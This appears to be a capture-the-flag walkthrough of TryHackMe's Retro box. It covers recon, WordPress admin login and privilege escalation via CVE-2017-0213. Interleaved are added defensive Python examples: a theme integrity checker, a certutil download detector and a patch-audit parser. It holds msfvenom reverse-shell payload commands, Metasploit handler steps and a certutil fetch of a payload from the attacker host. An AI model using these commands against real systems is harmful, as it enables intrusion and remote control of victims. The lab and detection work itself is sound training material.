Drive Off into the Sunset After You Exploit this CVE-2017-0213 Vulnerable Box in Retro CTF

This walkthrough will go over the Retro room found on TryHackMe. The objective behind this room is to use a bit of passive recon to find a set of credentials in order to RDP into the box, identify a vulnerability in the Windows COM (CVE-2017-0213), and privesc to NT AUTHORITY\SYSTEM.

Step 1: What's Out There?

nmap -sC -sV -p- -Pn retro.thm --min-rate=1000

Looks like we have a webserver and an RDP session open. Let's check out what the web server can offer us.

A default Microsoft IIS page. We'll use ffuf to enumerate for directories.

Step 2: FFUF

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://retro.thm/FUZZ -fs 703

Nice, we discovered a directory called /retro. Let's go to it.

Step 3: Finding Credentials

We discovered a blog that seems to be run by a user named Wade.

After downloading and viewing the Comments RSS data, we discovered text that might be a potential password.

Taking this information and plugging it into the Site Admin link allows us to log in to the WordPress admin panel.

Step 4: Initial Foothold

Based on my experience with getting a reverse shell with WordPress, we would need to modify the 404.php file and inject our generated shell code. We can do this with msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f raw -o retro_shell.php

Now let's start initializing our handler so we can catch the shell once it executes.

  1. msfconsole

  2. use exploit/multi/handler

  3. set payload php/meterpreter/reverse_tcp

  4. set LHOST <ATTACKER_IP>

  5. set LPORT 1337

  6. exploit

From here we want to copy our retro_shell.php code and paste it into 404.php. We can do this by navigating to Appearance > Theme Editor > 404 Template. Delete the contents of the 404.php file and paste your shell in its place. It should look like this.

Now navigate to the file in your browser (http://retro.thm/retro/wp-content/themes/90s-retro/404.php) and it will drop you into a meterpreter session.
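The foothold above works by overwriting a theme template through WordPress's built-in Theme Editor. The following is an added example (not code from the walkthrough or the room) of how a defender catches that: keep a hash baseline of the theme directory, diff it on a schedule, and review any changed PHP file against a heuristic list of calls that rarely belong in a template (eval, base64_decode, fsockopen and friends). The theme name, file contents and the "tampered" stub are constructed for the demo. Setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the Theme Editor entirely and is the simpler mitigation.

```python
# Added example: file-integrity check for a WordPress theme directory.
# Not the walkthrough's code; all paths and contents below are constructed.
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic only: PHP calls typical of web shells and staged payloads but rare in
# theme templates. A match is a lead to review, not proof of compromise.
SUSPICIOUS_PHP = re.compile(
    r"\b(eval|assert|base64_decode|shell_exec|passthru|system|fsockopen|stream_socket_client)\s*\(",
    re.IGNORECASE,
)


def hash_tree(root):
    """Return {relative posix path: sha256 hex} for every file under root."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifests(baseline, current):
    """Classify files as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def flag_suspicious_php(root, paths):
    """Return the subset of paths whose PHP source matches SUSPICIOUS_PHP."""
    root = Path(root)
    flagged = []
    for rel in paths:
        if rel.lower().endswith(".php") and SUSPICIOUS_PHP.search((root / rel).read_text(errors="replace")):
            flagged.append(rel)
    return flagged


def demo():
    """Build a toy theme, baseline it, simulate a Theme Editor overwrite, and report."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "90s-retro"  # constructed theme directory
        theme.mkdir()
        (theme / "404.php").write_text("<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n")
        (theme / "style.css").write_text("/*\nTheme Name: 90s Retro (constructed)\n*/\n")
        baseline = hash_tree(theme)

        # Simulated tampering: the template is replaced by a non-functional stub that
        # only carries the shape of a reverse-connect payload (socket + eval).
        (theme / "404.php").write_text("<?php $s = fsockopen(...); eval(...); ?>\n")

        current = hash_tree(theme)
        diff = diff_manifests(baseline, current)
        flagged = flag_suspicious_php(theme, diff["modified"] + diff["added"])
        return {"diff": diff, "flagged": flagged}


if __name__ == "__main__":
    print(demo())
```

In production the baseline would be written after each legitimate deploy and stored off the web host, so an attacker with Theme Editor access cannot rewrite it along with the template.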

Step 5: Detour

Okay, so for some reason I could not get the meterpreter shell to stabilize with the 404.php route. But, that's alright. Sometimes we have to get creative and approach a problem from a different angle... in the end, we still get the same outcome. Root.

So what I decided to do is RDP into the box with our same credentials and upload a payload, set my handler, and catch it with a stable meterpreter session.

Generate a payload using msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o payload.exe

Start an HTTP server on the attack box and transfer the payload over using certutil on the victim.

certutil -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe

Now we want to set up our listener and catch the shell. Same as before with a slight modification.

  1. msfconsole

  2. use exploit/multi/handler

  3. set payload windows/x64/meterpreter/reverse_tcp

  4. set LHOST <ATTACKER_IP>

  5. set LPORT 1337

  6. exploit

Run the payload on the victim box and the handler drops you into a meterpreter session.
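The certutil step in this detour is a well-known living-off-the-land download, and it is loud in process-creation telemetry. Below is an added example (not part of the walkthrough) of the detection logic a SOC would run over such events: it parses process-creation records and flags certutil launches that fetch from a URL or decode a staged file. The log lines are constructed, one JSON object per line with field names borrowed from Sysmon Event ID 1; the first line mirrors the command used above.

```python
# Added example: detection of certutil-based file transfer in process-creation logs.
# Not the walkthrough's code. SAMPLE_LOG is constructed for the demo.
import json
import re

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# certutil switches that trigger a network fetch, or turn text back into a binary
FETCH_SWITCHES = {"-urlcache", "-verifyctl"}
DECODE_SWITCHES = {"-decode", "-decodehex"}

SAMPLE_LOG = r'''
{"ProcessId": 4120, "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe"}
{"ProcessId": 4188, "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -dump C:\\certs\\site.cer"}
{"ProcessId": 4201, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -c Get-Date"}
{"ProcessId": 4310, "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -decode staged.b64 payload.exe"}
'''


def classify_event(event):
    """Return human-readable reasons an event is suspicious ([] if benign or not certutil)."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\certutil.exe"):
        return []
    cmdline = event.get("CommandLine", "")
    # certutil accepts both -switch and /switch; normalise to the dash form
    switches = {"-" + tok.lstrip("-/").lower() for tok in cmdline.split() if tok.startswith(("-", "/"))}
    reasons = []
    urls = URL_RE.findall(cmdline)
    if switches & FETCH_SWITCHES and urls:
        reasons.append(f"certutil fetched remote content from {urls[0]}")
        if "-f" in switches:
            reasons.append("forced refresh (-f) bypasses the local URL cache")
    if switches & DECODE_SWITCHES:
        reasons.append("certutil used to decode a file (common payload-staging step)")
    return reasons


def scan(log_lines):
    """Return (pid, parent_image, reasons) for every flagged event in an iterable of JSON lines."""
    hits = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = classify_event(event)
        if reasons:
            hits.append((event.get("ProcessId"), event.get("ParentImage"), reasons))
    return hits


def demo():
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for pid, parent, reasons in demo():
        print(pid, parent, "; ".join(reasons))
```

The parent image is carried along because certutil spawned from cmd.exe or powershell.exe inside an interactive RDP session, as in this room, is a stronger signal than the same binary launched by a management agent; a real rule would weight it accordingly rather than fire on every match.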

Step 6: Privesc

We're going to use the Windows Exploit Suggester (WES) to find a way to elevate our privileges. First, we need to pull the system's information for WES to work from.

systeminfo > sysinfo.txt

Now we can pull it down to our attack box.

From here we can use WES to find a privesc vector (update the database before running):

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2023-08-07-mssb.xls --systeminfo ~/sysinfo.txt --ostext 'windows 10 64-bit' -l

This build of Windows 10 is vulnerable to a Windows COM privesc, CVE-2017-0213. There's a binary that we can use to automate this exploit for us. Let's download it to our attack box and upload it to our victim. Link to binary here: https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
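What WES does with sysinfo.txt is mechanical: read the OS name, version, build and the list of installed KBs, then compare that against a bulletin database. The following is an added example (not the walkthrough's code and not WES itself) of that first half, a parser for `systeminfo` output plus a check for required KBs, which is the same check a vulnerability-management script runs to confirm a host is actually patched. The sample output and every KB number in it are constructed placeholders; the real KBs that close a given CVE come from the vendor bulletin, which is what the WES spreadsheet encodes.

```python
# Added example: parse `systeminfo` output into patch-audit fields and check KBs.
# Not the walkthrough's code. SAMPLE_SYSTEMINFO and all KB numbers are constructed.
import re

SAMPLE_SYSTEMINFO = """\
Host Name:                 RETRO-EXAMPLE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1000001
                           [02]: KB1000002
                           [03]: KB1000003
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Ethernet Adapter
"""

# Top-level "Key:   value" lines start in column 0; continuation lines are indented.
KEY_VALUE_RE = re.compile(r"^(?P<key>[A-Za-z][^:]*?):\s*(?P<value>.*)$")
HOTFIX_RE = re.compile(r"^\s+\[\d+\]:\s*(?P<kb>KB\d+)\s*$", re.IGNORECASE)
BUILD_RE = re.compile(r"Build\s+(?P<build>\d+)", re.IGNORECASE)


def parse_systeminfo(text):
    """Turn systeminfo's key/value listing into a dict; hotfixes become a set of KB ids."""
    info = {"hotfixes": set()}
    section = None
    for line in text.splitlines():
        kv = KEY_VALUE_RE.match(line)
        if kv:
            section = kv.group("key").strip()
            info[section] = kv.group("value").strip()
            continue
        hf = HOTFIX_RE.match(line)
        # Only trust "[nn]: KB..." lines while inside the Hotfix(s) section
        if hf and section == "Hotfix(s)":
            info["hotfixes"].add(hf.group("kb").upper())
    build = BUILD_RE.search(info.get("OS Version", ""))
    info["build"] = int(build.group("build")) if build else None
    info["is_64bit"] = "x64" in info.get("System Type", "")
    return info


def missing_patches(info, required_kbs):
    """Return the required KBs that are not installed on the host, sorted."""
    return sorted(kb.upper() for kb in required_kbs if kb.upper() not in info["hotfixes"])


def demo(required_kbs=("KB1000002", "KB1000009")):
    """Parse the constructed sample and check it against constructed required KBs."""
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    return info, missing_patches(info, required_kbs)


if __name__ == "__main__":
    info, missing = demo()
    print(info["OS Name"], info["build"], "x64" if info["is_64bit"] else "x86")
    print("installed:", sorted(info["hotfixes"]))
    print("missing:", missing)
```

Two caveats a practitioner wants here: `systeminfo` lists only hotfixes the Windows Update servicing stack knows about, so cumulative updates that supersede an older KB will not show the old number, and a host is "patched" when any superseding update is present. Any KB-based check, this one and WES included, therefore needs supersedence data or it will report false positives on current builds.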

Once we get it on our victim box we can run it and then move over to our RDP session and find a new CMD shell spawned with NT AUTHORITY\SYSTEM rights.

Finally...this one was very difficult and time-consuming. I ended up going down multiple rabbit holes and failing at stabilizing shells more times than I'd like to admit. But all-in-all, I can say this box was rewarding and has taught me a lot about Windows privesc. I hope you enjoyed this walkthrough, and as always, Happy Hacking.
